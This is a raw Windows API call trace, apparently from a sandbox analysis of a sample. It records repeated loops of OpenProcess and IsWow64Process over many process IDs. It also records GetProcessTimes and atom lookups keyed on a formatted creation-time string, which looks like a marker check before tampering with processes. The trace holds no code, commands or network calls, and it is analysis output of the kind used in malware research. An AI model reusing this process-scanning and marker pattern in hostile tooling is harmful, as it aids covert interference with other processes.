	[0108.411] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.411] CloseHandle (hObject=0x694) returned 1
	[0108.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0108.412] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.412] CloseHandle (hObject=0x694) returned 1
	[0108.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0108.412] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.412] CloseHandle (hObject=0x694) returned 1
	[0108.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0108.412] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.412] CloseHandle (hObject=0x694) returned 1
	[0108.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0108.412] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.412] CloseHandle (hObject=0x694) returned 1
	[0108.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0108.413] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.413] CloseHandle (hObject=0x694) returned 1
	[0108.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0108.413] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.413] CloseHandle (hObject=0x694) returned 1
	[0108.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0108.413] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.413] CloseHandle (hObject=0x694) returned 1
	[0108.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0108.413] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.413] CloseHandle (hObject=0x694) returned 1
	[0108.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0108.413] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.413] CloseHandle (hObject=0x694) returned 1
	[0108.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0108.414] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.414] CloseHandle (hObject=0x694) returned 1
	[0108.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0108.414] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.414] CloseHandle (hObject=0x694) returned 1
	[0108.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0108.414] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.414] CloseHandle (hObject=0x694) returned 1
	[0108.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0108.414] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.414] CloseHandle (hObject=0x694) returned 1
	[0108.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0108.414] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.414] CloseHandle (hObject=0x694) returned 1
	[0108.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0108.415] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.415] CloseHandle (hObject=0x694) returned 1
	[0108.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0108.415] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.415] CloseHandle (hObject=0x694) returned 1
	[0108.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0108.415] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.415] CloseHandle (hObject=0x694) returned 1
	[0108.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0108.415] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.415] CloseHandle (hObject=0x694) returned 1
	[0108.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0108.416] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.416] CloseHandle (hObject=0x694) returned 1
	[0108.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.416] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.416] CloseHandle (hObject=0x694) returned 1
	[0108.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.417] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.417] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0108.417] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0108.417] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0108.418] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.418] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0108.418] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.418] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0108.418] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0108.418] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0108.430] CloseHandle (hObject=0x694) returned 1
	[0108.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0108.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0108.430] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.430] CloseHandle (hObject=0x694) returned 1
	[0108.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0108.431] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.431] CloseHandle (hObject=0x694) returned 1
	[0108.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0108.431] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.431] CloseHandle (hObject=0x694) returned 1
	[0108.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0108.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0108.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0108.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0108.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0108.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0108.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0108.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0108.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0108.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0108.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0108.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0108.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0108.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0108.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0108.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0108.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0108.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0108.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0108.591] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.591] CloseHandle (hObject=0x694) returned 1
	[0108.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0108.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0108.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0108.591] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.591] CloseHandle (hObject=0x694) returned 1
	[0108.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0108.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0108.593] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.593] CloseHandle (hObject=0x694) returned 1
	[0108.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0108.593] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.593] CloseHandle (hObject=0x694) returned 1
	[0108.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0108.593] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.593] CloseHandle (hObject=0x694) returned 1
	[0108.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0108.593] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.594] CloseHandle (hObject=0x694) returned 1
	[0108.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0108.594] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.594] CloseHandle (hObject=0x694) returned 1
	[0108.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0108.594] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.594] CloseHandle (hObject=0x694) returned 1
	[0108.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0108.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0108.594] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.594] CloseHandle (hObject=0x694) returned 1
	[0108.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0108.595] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.595] CloseHandle (hObject=0x694) returned 1
	[0108.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0108.595] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.595] CloseHandle (hObject=0x694) returned 1
	[0108.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0108.595] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.595] CloseHandle (hObject=0x694) returned 1
	[0108.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0108.595] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.595] CloseHandle (hObject=0x694) returned 1
	[0108.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0108.595] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.596] CloseHandle (hObject=0x694) returned 1
	[0108.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0108.596] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.596] CloseHandle (hObject=0x694) returned 1
	[0108.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0108.596] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.596] CloseHandle (hObject=0x694) returned 1
	[0108.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0108.596] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.596] CloseHandle (hObject=0x694) returned 1
	[0108.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0108.596] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.596] CloseHandle (hObject=0x694) returned 1
	[0108.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0108.597] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.597] CloseHandle (hObject=0x694) returned 1
	[0108.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0108.597] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.597] CloseHandle (hObject=0x694) returned 1
	[0108.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0108.597] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.597] CloseHandle (hObject=0x694) returned 1
	[0108.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0108.597] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.598] CloseHandle (hObject=0x694) returned 1
	[0108.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0108.598] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.598] CloseHandle (hObject=0x694) returned 1
	[0108.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0108.598] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.598] CloseHandle (hObject=0x694) returned 1
	[0108.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0108.598] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.598] CloseHandle (hObject=0x694) returned 1
	[0108.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0108.598] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.598] CloseHandle (hObject=0x694) returned 1
	[0108.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0108.599] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.599] CloseHandle (hObject=0x694) returned 1
	[0108.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0108.599] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.599] CloseHandle (hObject=0x694) returned 1
	[0108.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0108.599] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.599] CloseHandle (hObject=0x694) returned 1
	[0108.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0108.599] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.599] CloseHandle (hObject=0x694) returned 1
	[0108.599] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.599] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.599] CloseHandle (hObject=0x694) returned 1
	[0108.600] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0108.600] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.600] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0108.601] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0108.601] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0108.601] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.601] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0108.606] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0108.607] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0108.607] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0108.607] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0108.607] CloseHandle (hObject=0x694) returned 1
	[0108.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0108.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0108.607] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.607] CloseHandle (hObject=0x694) returned 1
	[0108.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0108.608] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.608] CloseHandle (hObject=0x694) returned 1
	[0108.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0108.608] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.608] CloseHandle (hObject=0x694) returned 1
	[0108.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0108.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0108.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0108.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0108.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0108.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0108.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0108.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0108.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0108.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0108.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0108.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0108.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0108.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0108.643] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0108.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0108.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0108.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0108.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0108.644] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.644] CloseHandle (hObject=0x694) returned 1
	[0108.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0108.644] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0108.645] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0108.645] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.645] CloseHandle (hObject=0x694) returned 1
	[0108.646] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0108.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0108.647] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.647] CloseHandle (hObject=0x694) returned 1
	[0108.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0108.647] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.647] CloseHandle (hObject=0x694) returned 1
	[0108.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0108.647] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.647] CloseHandle (hObject=0x694) returned 1
	[0108.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0108.647] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.647] CloseHandle (hObject=0x694) returned 1
	[0108.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0108.647] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.647] CloseHandle (hObject=0x694) returned 1
	[0108.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0108.648] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.648] CloseHandle (hObject=0x694) returned 1
	[0108.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0108.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0108.648] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.648] CloseHandle (hObject=0x694) returned 1
	[0108.648] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0108.648] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.648] CloseHandle (hObject=0x694) returned 1
	[0108.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0108.649] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.649] CloseHandle (hObject=0x694) returned 1
	[0108.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0108.649] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.649] CloseHandle (hObject=0x694) returned 1
	[0108.649] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0108.653] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.653] CloseHandle (hObject=0x694) returned 1
	[0108.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0108.653] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.653] CloseHandle (hObject=0x694) returned 1
	[0108.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0108.653] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.653] CloseHandle (hObject=0x694) returned 1
	[0108.653] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0108.654] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.654] CloseHandle (hObject=0x694) returned 1
	[0108.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0108.654] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0108.654] CloseHandle (hObject=0x694) returned 1
	[0108.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0108.654] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
